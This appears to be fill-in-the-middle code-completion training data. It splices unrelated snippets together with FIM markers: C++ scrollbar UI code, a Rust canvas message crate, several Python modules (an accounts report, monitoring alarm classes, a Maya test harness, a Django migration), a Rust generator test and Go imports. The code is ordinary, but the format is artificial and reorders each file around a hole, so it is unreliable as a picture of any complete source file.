// The stroke doesn't apply to the far edge of the thumb.
SkPath path;
path.moveTo(gfx::PointFToSkPoint(stroke_bounds.top_right()));
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.origin()));
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.bottom_left()));
if (IsHorizontal()) {
path.moveTo(gfx::PointFToSkPoint(stroke_bounds.bottom_right()));
path.close();
} else {
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.bottom_right()));
}
canvas->DrawPath(path, stroke_flags);
}
void OverlayScrollBar::Thumb::OnBoundsChanged(
const gfx::Rect& previous_bounds) {
scroll_bar_->Show();
// Don't start the hide countdown if the thumb is still hovered or pressed.
if (GetState() == Button::STATE_NORMAL)
scroll_bar_->StartHideCountdown();
}
void OverlayScrollBar::Thumb::OnStateChanged() {
if (GetState() == Button::STATE_NORMAL) {
gfx::Transform translation;
const int direction = base::i18n::IsRTL() ? -1 : 1;
translation.Translate(
gfx::Vector2d(IsHorizontal() ? 0 : direction * kThumbHoverOffset,
IsHorizontal() ? kThumbHoverOffset : 0));
layer()->SetTransform(translation);
if (GetWidget())
scroll_bar_->StartHideCountdown();
} else {
layer()->SetTransform(gfx::Transform());
}
SchedulePaint();
}
OverlayScrollBar::OverlayScrollBar(bool horizontal) : ScrollBar(horizontal) {
SetNotifyEnterExitOnChild(true);
SetPaintToLayer();
layer()->SetMasksToBounds(true);
layer()->SetFillsBoundsOpaquely(false);
// Allow the thumb to take up the whole size of the scrollbar. Layout need
// only set the thumb cross-axis coordinate; ScrollBar::Update() will set the
// thumb size/offset.
SetLayoutManager(std::make_unique<views::FillLayout>());
auto* thumb = new Thumb(this);
SetThumb(thumb);
thumb->Init();
}
OverlayScrollBar::~OverlayScrollBar() = default;
gfx::Insets OverlayScrollBar::GetInsets() const {
return IsHorizontal() ? gfx::Insets(-kThumbHoverOffset, 0, 0, 0)
: gfx::Insets(0, -kThumbHoverOffset, 0, 0);
}
void OverlayScrollBar::OnMouseEntered(const ui::MouseEvent& event) {
Show();
}
void OverlayScrollBar::OnMouseExited(const ui::MouseEvent& event) {
StartHideCountdown();
}
bool OverlayScrollBar::OverlapsContent() const {
return true;
}
gfx::Rect OverlayScrollBar::GetTrackBounds() const {
return GetContentsBounds();
}
int OverlayScrollBar::GetThickness() const {
return kThumbThickness;
}
void OverlayScrollBar::Show() {
layer()->SetOpacity(1.0f);
hide_timer_.Stop();
}
void OverlayScrollBar::Hide() {
ui::ScopedLayerAnimationSettings settings(layer()->GetAnimator());
settings.SetTransitionDuration(ui::kOverlayScrollbarFadeDuration);
layer()->SetOpacity(0.0f);
}
void OverlayScrollBar::StartHideCountdown() {
if (IsMouseHovered())
return;
hide_timer_.Start(
FROM_HERE, ui::kOverlayScrollbarFadeDelay,
base::BindOnce(&OverlayScrollBar::Hide, base::Unretained(this)));
}
BEGIN_METADATA(OverlayScrollBar, ScrollBar)
END_METADATA
} // namespace views<|fim▁end|>
|
#include "base/macros.h"
#include "cc/paint/paint_flags.h"
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#![crate_name = "canvas_traits"]
#![crate_type = "rlib"]
#![feature(custom_derive)]
#![feature(plugin)]
#![plugin(heapsize_plugin, plugins, serde_macros)]
#![deny(unsafe_code)]
extern crate azure;
extern crate core;
extern crate cssparser;
extern crate euclid;
extern crate gfx_traits;
extern crate heapsize;
extern crate ipc_channel;
extern crate serde;
extern crate webrender_traits;
use azure::azure::{AzColor, AzFloat};
use azure::azure_hl::{CapStyle, CompositionOp, JoinStyle};
use azure::azure_hl::{ColorPattern, DrawTarget, Pattern};
use azure::azure_hl::{ExtendMode, GradientStop, LinearGradientPattern, RadialGradientPattern};
use azure::azure_hl::{SurfaceFormat, SurfacePattern};
use cssparser::RGBA;
use euclid::matrix2d::Matrix2D;
use euclid::point::Point2D;
use euclid::rect::Rect;
use euclid::size::Size2D;
use gfx_traits::color;
use ipc_channel::ipc::{IpcSender, IpcSharedMemory};
use std::default::Default;
use std::str::FromStr;
use webrender_traits::{WebGLCommand, WebGLContextId};
#[derive(Clone, Deserialize, Serialize)]
pub enum FillRule {
Nonzero,
Evenodd,
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasMsg {
Canvas2d(Canvas2dMsg),
Common(CanvasCommonMsg),
FromLayout(FromLayoutMsg),
WebGL(WebGLCommand),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasCommonMsg {
Close,
Recreate(Size2D<i32>),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasData {
Pixels(CanvasPixelData),
WebGL(WebGLContextId),
}
#[derive(Clone, Deserialize, Serialize)]
pub struct CanvasPixelData {
pub image_data: IpcSharedMemory,
pub image_key: Option<webrender_traits::ImageKey>,
}
#[derive(Clone, Deserialize, Serialize)]
pub enum FromLayoutMsg {
SendData(IpcSender<CanvasData>),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum Canvas2dMsg {
Arc(Point2D<f32>, f32, f32, f32, bool),
ArcTo(Point2D<f32>, Point2D<f32>, f32),
DrawImage(Vec<u8>, Size2D<f64>, Rect<f64>, Rect<f64>, bool),
DrawImageSelf(Size2D<f64>, Rect<f64>, Rect<f64>, bool),
BeginPath,
BezierCurveTo(Point2D<f32>, Point2D<f32>, Point2D<f32>),<|fim▁hole|> FillRect(Rect<f32>),
GetImageData(Rect<i32>, Size2D<f64>, IpcSender<Vec<u8>>),
IsPointInPath(f64, f64, FillRule, IpcSender<bool>),
LineTo(Point2D<f32>),
MoveTo(Point2D<f32>),
PutImageData(Vec<u8>, Point2D<f64>, Size2D<f64>, Rect<f64>),
QuadraticCurveTo(Point2D<f32>, Point2D<f32>),
Rect(Rect<f32>),
RestoreContext,
SaveContext,
StrokeRect(Rect<f32>),
Stroke,
SetFillStyle(FillOrStrokeStyle),
SetStrokeStyle(FillOrStrokeStyle),
SetLineWidth(f32),
SetLineCap(LineCapStyle),
SetLineJoin(LineJoinStyle),
SetMiterLimit(f32),
SetGlobalAlpha(f32),
SetGlobalComposition(CompositionOrBlending),
SetTransform(Matrix2D<f32>),
SetShadowOffsetX(f64),
SetShadowOffsetY(f64),
SetShadowBlur(f64),
SetShadowColor(RGBA),
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct CanvasGradientStop {
pub offset: f64,
pub color: RGBA,
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct LinearGradientStyle {
pub x0: f64,
pub y0: f64,
pub x1: f64,
pub y1: f64,
pub stops: Vec<CanvasGradientStop>
}
impl LinearGradientStyle {
pub fn new(x0: f64, y0: f64, x1: f64, y1: f64, stops: Vec<CanvasGradientStop>)
-> LinearGradientStyle {
LinearGradientStyle {
x0: x0,
y0: y0,
x1: x1,
y1: y1,
stops: stops,
}
}
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct RadialGradientStyle {
pub x0: f64,
pub y0: f64,
pub r0: f64,
pub x1: f64,
pub y1: f64,
pub r1: f64,
pub stops: Vec<CanvasGradientStop>
}
impl RadialGradientStyle {
pub fn new(x0: f64, y0: f64, r0: f64, x1: f64, y1: f64, r1: f64, stops: Vec<CanvasGradientStop>)
-> RadialGradientStyle {
RadialGradientStyle {
x0: x0,
y0: y0,
r0: r0,
x1: x1,
y1: y1,
r1: r1,
stops: stops,
}
}
}
#[derive(Clone, Deserialize, Serialize)]
pub struct SurfaceStyle {
pub surface_data: Vec<u8>,
pub surface_size: Size2D<i32>,
pub repeat_x: bool,
pub repeat_y: bool,
}
impl SurfaceStyle {
pub fn new(surface_data: Vec<u8>, surface_size: Size2D<i32>, repeat_x: bool, repeat_y: bool)
-> SurfaceStyle {
SurfaceStyle {
surface_data: surface_data,
surface_size: surface_size,
repeat_x: repeat_x,
repeat_y: repeat_y,
}
}
}
#[derive(Clone, Deserialize, Serialize)]
pub enum FillOrStrokeStyle {
Color(RGBA),
LinearGradient(LinearGradientStyle),
RadialGradient(RadialGradientStyle),
Surface(SurfaceStyle),
}
impl FillOrStrokeStyle {
pub fn to_azure_pattern(&self, drawtarget: &DrawTarget) -> Option<Pattern> {
match *self {
FillOrStrokeStyle::Color(ref color) => {
Some(Pattern::Color(ColorPattern::new(color::new(color.red,
color.green,
color.blue,
color.alpha))))
},
FillOrStrokeStyle::LinearGradient(ref linear_gradient_style) => {
let gradient_stops: Vec<GradientStop> = linear_gradient_style.stops.iter().map(|s| {
GradientStop {
offset: s.offset as AzFloat,
color: color::new(s.color.red, s.color.green, s.color.blue, s.color.alpha)
}
}).collect();
Some(Pattern::LinearGradient(LinearGradientPattern::new(
&Point2D::new(linear_gradient_style.x0 as AzFloat, linear_gradient_style.y0 as AzFloat),
&Point2D::new(linear_gradient_style.x1 as AzFloat, linear_gradient_style.y1 as AzFloat),
drawtarget.create_gradient_stops(&gradient_stops, ExtendMode::Clamp),
&Matrix2D::identity())))
},
FillOrStrokeStyle::RadialGradient(ref radial_gradient_style) => {
let gradient_stops: Vec<GradientStop> = radial_gradient_style.stops.iter().map(|s| {
GradientStop {
offset: s.offset as AzFloat,
color: color::new(s.color.red, s.color.green, s.color.blue, s.color.alpha)
}
}).collect();
Some(Pattern::RadialGradient(RadialGradientPattern::new(
&Point2D::new(radial_gradient_style.x0 as AzFloat, radial_gradient_style.y0 as AzFloat),
&Point2D::new(radial_gradient_style.x1 as AzFloat, radial_gradient_style.y1 as AzFloat),
radial_gradient_style.r0 as AzFloat, radial_gradient_style.r1 as AzFloat,
drawtarget.create_gradient_stops(&gradient_stops, ExtendMode::Clamp),
&Matrix2D::identity())))
},
FillOrStrokeStyle::Surface(ref surface_style) => {
drawtarget.create_source_surface_from_data(&surface_style.surface_data,
surface_style.surface_size,
surface_style.surface_size.width * 4,
SurfaceFormat::B8G8R8A8)
.map(|source_surface| {
Pattern::Surface(SurfacePattern::new(
source_surface.azure_source_surface,
surface_style.repeat_x,
surface_style.repeat_y,
&Matrix2D::identity()))
})
}
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum LineCapStyle {
Butt = 0,
Round = 1,
Square = 2,
}
impl FromStr for LineCapStyle {
type Err = ();
fn from_str(string: &str) -> Result<LineCapStyle, ()> {
match string {
"butt" => Ok(LineCapStyle::Butt),
"round" => Ok(LineCapStyle::Round),
"square" => Ok(LineCapStyle::Square),
_ => Err(()),
}
}
}
impl LineCapStyle {
pub fn to_azure_style(&self) -> CapStyle {
match *self {
LineCapStyle::Butt => CapStyle::Butt,
LineCapStyle::Round => CapStyle::Round,
LineCapStyle::Square => CapStyle::Square,
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum LineJoinStyle {
Round = 0,
Bevel = 1,
Miter = 2,
}
impl FromStr for LineJoinStyle {
type Err = ();
fn from_str(string: &str) -> Result<LineJoinStyle, ()> {
match string {
"round" => Ok(LineJoinStyle::Round),
"bevel" => Ok(LineJoinStyle::Bevel),
"miter" => Ok(LineJoinStyle::Miter),
_ => Err(()),
}
}
}
impl LineJoinStyle {
pub fn to_azure_style(&self) -> JoinStyle {
match *self {
LineJoinStyle::Round => JoinStyle::Round,
LineJoinStyle::Bevel => JoinStyle::Bevel,
LineJoinStyle::Miter => JoinStyle::Miter,
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize)]
pub enum RepetitionStyle {
Repeat,
RepeatX,
RepeatY,
NoRepeat,
}
impl FromStr for RepetitionStyle {
type Err = ();
fn from_str(string: &str) -> Result<RepetitionStyle, ()> {
match string {
"repeat" => Ok(RepetitionStyle::Repeat),
"repeat-x" => Ok(RepetitionStyle::RepeatX),
"repeat-y" => Ok(RepetitionStyle::RepeatY),
"no-repeat" => Ok(RepetitionStyle::NoRepeat),
_ => Err(()),
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum CompositionStyle {
SrcIn,
SrcOut,
SrcOver,
SrcAtop,
DestIn,
DestOut,
DestOver,
DestAtop,
Copy,
Lighter,
Xor,
}
impl FromStr for CompositionStyle {
type Err = ();
fn from_str(string: &str) -> Result<CompositionStyle, ()> {
match string {
"source-in" => Ok(CompositionStyle::SrcIn),
"source-out" => Ok(CompositionStyle::SrcOut),
"source-over" => Ok(CompositionStyle::SrcOver),
"source-atop" => Ok(CompositionStyle::SrcAtop),
"destination-in" => Ok(CompositionStyle::DestIn),
"destination-out" => Ok(CompositionStyle::DestOut),
"destination-over" => Ok(CompositionStyle::DestOver),
"destination-atop" => Ok(CompositionStyle::DestAtop),
"copy" => Ok(CompositionStyle::Copy),
"lighter" => Ok(CompositionStyle::Lighter),
"xor" => Ok(CompositionStyle::Xor),
_ => Err(())
}
}
}
impl CompositionStyle {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
CompositionStyle::SrcIn => CompositionOp::In,
CompositionStyle::SrcOut => CompositionOp::Out,
CompositionStyle::SrcOver => CompositionOp::Over,
CompositionStyle::SrcAtop => CompositionOp::Atop,
CompositionStyle::DestIn => CompositionOp::DestIn,
CompositionStyle::DestOut => CompositionOp::DestOut,
CompositionStyle::DestOver => CompositionOp::DestOver,
CompositionStyle::DestAtop => CompositionOp::DestAtop,
CompositionStyle::Copy => CompositionOp::Source,
CompositionStyle::Lighter => CompositionOp::Add,
CompositionStyle::Xor => CompositionOp::Xor,
}
}
pub fn to_str(&self) -> &str {
match *self {
CompositionStyle::SrcIn => "source-in",
CompositionStyle::SrcOut => "source-out",
CompositionStyle::SrcOver => "source-over",
CompositionStyle::SrcAtop => "source-atop",
CompositionStyle::DestIn => "destination-in",
CompositionStyle::DestOut => "destination-out",
CompositionStyle::DestOver => "destination-over",
CompositionStyle::DestAtop => "destination-atop",
CompositionStyle::Copy => "copy",
CompositionStyle::Lighter => "lighter",
CompositionStyle::Xor => "xor",
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum BlendingStyle {
Multiply,
Screen,
Overlay,
Darken,
Lighten,
ColorDodge,
ColorBurn,
HardLight,
SoftLight,
Difference,
Exclusion,
Hue,
Saturation,
Color,
Luminosity,
}
impl FromStr for BlendingStyle {
type Err = ();
fn from_str(string: &str) -> Result<BlendingStyle, ()> {
match string {
"multiply" => Ok(BlendingStyle::Multiply),
"screen" => Ok(BlendingStyle::Screen),
"overlay" => Ok(BlendingStyle::Overlay),
"darken" => Ok(BlendingStyle::Darken),
"lighten" => Ok(BlendingStyle::Lighten),
"color-dodge" => Ok(BlendingStyle::ColorDodge),
"color-burn" => Ok(BlendingStyle::ColorBurn),
"hard-light" => Ok(BlendingStyle::HardLight),
"soft-light" => Ok(BlendingStyle::SoftLight),
"difference" => Ok(BlendingStyle::Difference),
"exclusion" => Ok(BlendingStyle::Exclusion),
"hue" => Ok(BlendingStyle::Hue),
"saturation" => Ok(BlendingStyle::Saturation),
"color" => Ok(BlendingStyle::Color),
"luminosity" => Ok(BlendingStyle::Luminosity),
_ => Err(())
}
}
}
impl BlendingStyle {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
BlendingStyle::Multiply => CompositionOp::Multiply,
BlendingStyle::Screen => CompositionOp::Screen,
BlendingStyle::Overlay => CompositionOp::Overlay,
BlendingStyle::Darken => CompositionOp::Darken,
BlendingStyle::Lighten => CompositionOp::Lighten,
BlendingStyle::ColorDodge => CompositionOp::ColorDodge,
BlendingStyle::ColorBurn => CompositionOp::ColorBurn,
BlendingStyle::HardLight => CompositionOp::HardLight,
BlendingStyle::SoftLight => CompositionOp::SoftLight,
BlendingStyle::Difference => CompositionOp::Difference,
BlendingStyle::Exclusion => CompositionOp::Exclusion,
BlendingStyle::Hue => CompositionOp::Hue,
BlendingStyle::Saturation => CompositionOp::Saturation,
BlendingStyle::Color => CompositionOp::Color,
BlendingStyle::Luminosity => CompositionOp::Luminosity,
}
}
pub fn to_str(&self) -> &str {
match *self {
BlendingStyle::Multiply => "multiply",
BlendingStyle::Screen => "screen",
BlendingStyle::Overlay => "overlay",
BlendingStyle::Darken => "darken",
BlendingStyle::Lighten => "lighten",
BlendingStyle::ColorDodge => "color-dodge",
BlendingStyle::ColorBurn => "color-burn",
BlendingStyle::HardLight => "hard-light",
BlendingStyle::SoftLight => "soft-light",
BlendingStyle::Difference => "difference",
BlendingStyle::Exclusion => "exclusion",
BlendingStyle::Hue => "hue",
BlendingStyle::Saturation => "saturation",
BlendingStyle::Color => "color",
BlendingStyle::Luminosity => "luminosity",
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum CompositionOrBlending {
Composition(CompositionStyle),
Blending(BlendingStyle),
}
impl Default for CompositionOrBlending {
fn default() -> CompositionOrBlending {
CompositionOrBlending::Composition(CompositionStyle::SrcOver)
}
}
impl FromStr for CompositionOrBlending {
type Err = ();
fn from_str(string: &str) -> Result<CompositionOrBlending, ()> {
if let Ok(op) = CompositionStyle::from_str(string) {
return Ok(CompositionOrBlending::Composition(op));
}
if let Ok(op) = BlendingStyle::from_str(string) {
return Ok(CompositionOrBlending::Blending(op));
}
Err(())
}
}
impl CompositionOrBlending {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
CompositionOrBlending::Composition(op) => op.to_azure_style(),
CompositionOrBlending::Blending(op) => op.to_azure_style(),
}
}
}
pub trait ToAzColor {
fn to_azcolor(&self) -> AzColor;
}
impl ToAzColor for RGBA {
fn to_azcolor(&self) -> AzColor {
color::rgba(self.red as AzFloat,
self.green as AzFloat,
self.blue as AzFloat,
self.alpha as AzFloat)
}
}<|fim▁end|>
|
ClearRect(Rect<f32>),
Clip,
ClosePath,
Fill,
|
<|file_name|>accounts_payable.py<|end_file_name|><|fim▁begin|># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt<|fim▁hole|>
def execute(filters=None):
args = {
"party_type": "Supplier",
"naming_by": ["Buying Settings", "supp_master_name"],
}
return ReceivablePayableReport(filters).run(args)<|fim▁end|>
|
from __future__ import unicode_literals
import frappe
from erpnext.accounts.report.accounts_receivable.accounts_receivable import ReceivablePayableReport
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.<|fim▁hole|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from synaps.monitor.api import API
from synaps.utils import (validate_email, validate_international_phonenumber,
validate_instance_action,
validate_groupnotification_action)
import json
class Datapoint(object):
"""
The Datapoint data type encapsulates the statistical data that Amazon
CloudWatch computes from metric data.
Average
The average of metric values that correspond to the datapoint.
Type: Double
Maximum
The maximum of the metric value used for the datapoint.
Type: Double
Minimum
The minimum metric value used for the datapoint.
Type: Double
SampleCount
The number of metric values that contributed to the aggregate value of
this datapoint.
Type: Double
Sum
The sum of metric values used for the datapoint.
Type: Double
Timestamp
The time stamp used for the datapoint.
Type: DateTime
Unit
The standard unit used for the datapoint.
Type: String
Valid Values: Seconds | Microseconds | Milliseconds | Bytes |
Kilobytes | Megabytes | Gigabytes | Terabytes | Bits |
Kilobits | Megabits | Gigabits | Terabits | Percent |
Count | Bytes/Second | Kilobytes/Second |
Megabytes/Second | Gigabytes/Second | Terabytes/Second |
Bits/Second | Kilobits/Second | Megabits/Second |
Gigabits/Second | Terabits/Second | Count/Second | None
"""
class Dimension(object):
"""
The Dimension data type further expands on the identity of a metric using
a Name, Value pair.
For examples that use one or more dimensions, see PutMetricData.
Name
The name of the dimension.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Value
The value representing the dimension measurement
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
class DimensionFilter(object):
"""
The DimensionFilter data type is used to filter ListMetrics results.
Name
The dimension name to be matched.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Value
The value of the dimension to be matched.
Note: Specifying a Name without specifying a Value returns all values
associated with that Name.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
class GetMetricStatisticsResult(object):
"""
The output for the GetMetricStatistics action.
Datapoints
The datapoints for the specified metric.
Type: Datapoint list
Label
A label describing the specified metric.
Type: String
"""
class ListMetricsResult(object):
"""
The output for the ListMetrics action.
Metrics
A list of metrics used to generate statistics for an AWS account.
Type: Metric list
NextToken
A string that marks the start of the next batch of returned results.
Type: String
"""
class Metric(object):
"""
The Metric data type contains information about a specific metric. If you
call ListMetrics, Amazon CloudWatch returns information contained by this
data type.
The example in the Examples section publishes two metrics named buffers
and latency. Both metrics are in the examples namespace. Both metrics have
two dimensions, InstanceID and InstanceType.
Dimensions
A list of dimensions associated with the metric.
Type: Dimension list
Length constraints: Minimum of 0 item(s) in the list. Maximum of 10
item(s) in the list.
MetricName
The name of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Namespace
The namespace of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
def __init__(self, project_id=None, namespace=None, name=None,
dimensions=None):
self.project_id = project_id
self.name = name
self.dimensions = dimensions
class MetricAlarm(object):
OP_MAP = {'>=':'GreaterThanOrEqualToThreshold',
'>':'GreaterThanThreshold',
'<':'LessThanThreshold',
'<=':'LessThanOrEqualToThreshold'}
STATISTICS = ('SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum')
OP_VALUES = OP_MAP.values()
def __init__(self, alarm_name, comparison_operator, evaluation_periods,
metric_name, namespace, period, statistic, threshold,
actions_enabled=False, alarm_actions=[], alarm_description="",
dimensions={}, insufficient_data_actions=[], ok_actions=[],
unit=""):
def validate_actions(actions):
assert (isinstance(actions, list))
for a in actions:
assert (validate_email(a) or
validate_international_phonenumber(a) or
validate_instance_action(a) or
validate_groupnotification_action(a))
assert (isinstance(actions_enabled, bool))
self.actions_enabled = actions_enabled
validate_actions(alarm_actions)
self.alarm_actions = alarm_actions
validate_actions(insufficient_data_actions)
self.insufficient_data_actions = insufficient_data_actions
validate_actions(ok_actions)
self.ok_actions = ok_actions
assert (len(alarm_description) <= 255)
self.alarm_description = alarm_description
assert (len(alarm_name) <= 255)
self.alarm_name = alarm_name
assert (comparison_operator in self.OP_MAP.values())
self.comparison_operator = comparison_operator
assert (isinstance(dimensions, dict))
self.dimensions = dimensions
assert (isinstance(evaluation_periods, int))
self.evaluation_periods = evaluation_periods
assert (len(metric_name) <= 255)
self.metric_name = metric_name
assert (len(namespace) <= 255)
self.namespace = namespace
assert (isinstance(period, int))
self.period = period
assert (statistic in self.STATISTICS)
self.statistic = statistic
self.threshold = threshold
self.unit = unit
self.alarm_arn = None
self.alarm_configuration_updated_timestamp = None
self.state_reason = None
self.state_reason_data = None
self.state_updated_timestamp = None
self.state_value = None
def to_columns(self):
return {
'actions_enabled': self.actions_enabled,
'alarm_actions': json.dumps(self.alarm_actions),
'alarm_arn': self.alarm_arn,
'alarm_configuration_updated_timestamp':
self.alarm_configuration_updated_timestamp,
'alarm_description': self.alarm_description,
'alarm_name': self.alarm_name,
'comparison_operator': self.comparison_operator,
'dimensions':json.dumps(self.dimensions),
'evaluation_periods':self.evaluation_periods,
'insufficient_data_actions': \
json.dumps(self.insufficient_data_actions),
'metric_name':self.metric_name,
'namespace':self.namespace,
'ok_actions':json.dumps(self.ok_actions),
'period':self.period,
'statistic':self.statistic,
'threshold':self.threshold,
'unit':self.unit
}
def __repr__(self):
return "MetricAlarm:%s[%s(%s) %s %s]" % (self.alarm_name,
self.metric_name,
self.statistic,
self.comparison_operator,
self.threshold)
class MetricDatum(object):
"""
The MetricDatum data type encapsulates the information sent with
PutMetricData to either create a new metric or add new values to be
aggregated into an existing metric.
Dimensions
A list of dimensions associated with the metric.
Type: Dimension list
Length constraints: Minimum of 0 item(s) in the list. Maximum of 10
item(s) in the list.
MetricName
The name of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
StatisticValues
A set of statistical values describing the metric.
Type: StatisticSet
Timestamp
The time stamp used for the metric. If not specified, the default
value is set to the time the metric data was received.
Type: DateTime
Unit
The unit of the metric.
Type: String
Valid Values: Seconds | Microseconds | Milliseconds | Bytes |
Kilobytes | Megabytes | Gigabytes | Terabytes | Bits |
Kilobits | Megabits | Gigabits | Terabits | Percent |
Count | Bytes/Second | Kilobytes/Second |
Megabytes/Second | Gigabytes/Second | Terabytes/Second |
Bits/Second | Kilobits/Second | Megabits/Second |
Gigabits/Second | Terabits/Second | Count/Second | None
Value
The value for the metric.
Important: Although the Value parameter accepts numbers of type
Double, Amazon CloudWatch truncates values with very large exponents.
Values with base-10 exponents greater than 126 (1 x 10^126) are
truncated. Likewise, values with base-10 exponents less than -130
(1 x 10^-130) are also truncated.
Type: Double
"""
class StatisticSet(object):
"""
The StatisticSet data type describes the StatisticValues component of
MetricDatum, and represents a set of statistics that describes a specific
metric.
Maximum
The maximum value of the sample set.
Type: Double
Minimum
The minimum value of the sample set.
Type: Double
SampleCount
The number of samples used for the statistic set.
Type: Double
Sum
The sum of values for the sample set.
Type: Double
"""<|fim▁end|>
|
# Copyright (c) 2012 Samsung SDS Co., LTD
# All Rights Reserved.
#
|
<|file_name|>mayatestcase.py<|end_file_name|><|fim▁begin|>"""This is a really rough implementation but demonstrates the
core ideas."""<|fim▁hole|>import os
import unittest
try:
import maya
ISMAYA = True
except ImportError:
maya, ISMAYA = None, False
from mayaserver.client import start_process, create_client, sendrecv
class MayaTestCase(unittest.TestCase):
def _setUp(self):
cls = self.__class__
if hasattr(cls, '_setupRan'):
return
cls.reqport = start_process()
cls.reqsock = create_client(cls.reqport)
appendstr = 'import sys; sys.path.append(%r)' % (
os.path.dirname(__file__))
sendrecv(cls.reqsock, ('exec', appendstr))
cls.testmodule = cls.__module__
cls.testalias = cls.testmodule.replace('.', '_')
impstr = 'import %s as %s' % (cls.testmodule, cls.testalias)
sendrecv(cls.reqsock, ('exec', impstr))
MayaTestCase._setupRan = True
def run(self, result=None):
if ISMAYA:
unittest.TestCase.run(self, result)
return
def wrappedTest():
self.__testMethodName = self._testMethodName
try:
self._wrappedTest()
finally:
self._testMethodName = self.__testMethodName
self.setUp = lambda: None
self.tearDown = lambda: None
self._setUp()
setattr(self, self._testMethodName, wrappedTest)
unittest.TestCase.run(self, result)
def _wrappedTest(self):
strargs = dict(testmodule=self.testalias,
testcase=self.__class__.__name__,
testfunc=self._testMethodName)
teststr = """tc = {testmodule}.{testcase}("{testfunc}")
try:
tc.setUp()
tc.{testfunc}()
finally:
tc.tearDown()""".format(**strargs)
try:
sendrecv(self.reqsock, ('exec', teststr))
except RuntimeError as ex:
if 'AssertionError' in str(ex):
raise AssertionError(*ex.args)
raise<|fim▁end|>
| |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-04 05:22
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators<|fim▁hole|>
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Policy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_duration_date_start', models.DateTimeField(blank=True, null=True)),
('news_duration_date_end', models.DateTimeField(blank=True, null=True)),
('contests_duration_date_start', models.DateTimeField(blank=True, null=True)),
('contests_duration_date_end', models.DateTimeField(blank=True, null=True)),
('max_answers_per_question', models.PositiveSmallIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1)])),
('map_radius', models.PositiveSmallIntegerField(default=500, validators=[django.core.validators.MinValueValidator(1)])),
('admin_email', models.CharField(default='[email protected]', max_length=100)),
('messages_new_account', models.TextField(blank=True, null=True)),
('messages_new_contest', models.TextField(blank=True, null=True)),
('messages_new_loyalty_item', models.TextField(blank=True, null=True)),
('messages_winner', models.TextField(blank=True, null=True)),
('last_update_datetime', models.DateTimeField(blank=True, null=True)),
('claiming_method', models.CharField(blank=True, max_length=200, null=True)),
('country', models.CharField(blank=True, choices=[('indonesia', 'Indonesia'), ('malaysia', 'Malaysia'), ('philippines', 'Philippines'), ('singapore', 'Singapore')], default='Philippines', max_length=15)),
('salesrep_no', models.CharField(blank=True, max_length=200, null=True)),
('last_update_by_author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'cms_policy',
'verbose_name_plural': 'Policies',
},
),
]<|fim▁end|>
|
from django.db import migrations, models
import django.db.models.deletion
|
<|file_name|>metadata-sufficient-for-layout.rs<|end_file_name|><|fim▁begin|>// compile-flags: --emit metadata
#![feature(generators, generator_trait)]
use std::marker::Unpin;
use std::ops::Generator;
pub fn g() -> impl Generator<(), Yield = (), Return = ()> {
|| {<|fim▁hole|> yield;
}
}<|fim▁end|>
| |
<|file_name|>simple_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package deployer_test
import (
"encoding/json"
"io/ioutil"<|fim▁hole|> "sort"
jc "github.com/juju/testing/checkers"
"github.com/juju/utils/arch"
"github.com/juju/utils/series"
"github.com/juju/version"
gc "gopkg.in/check.v1"
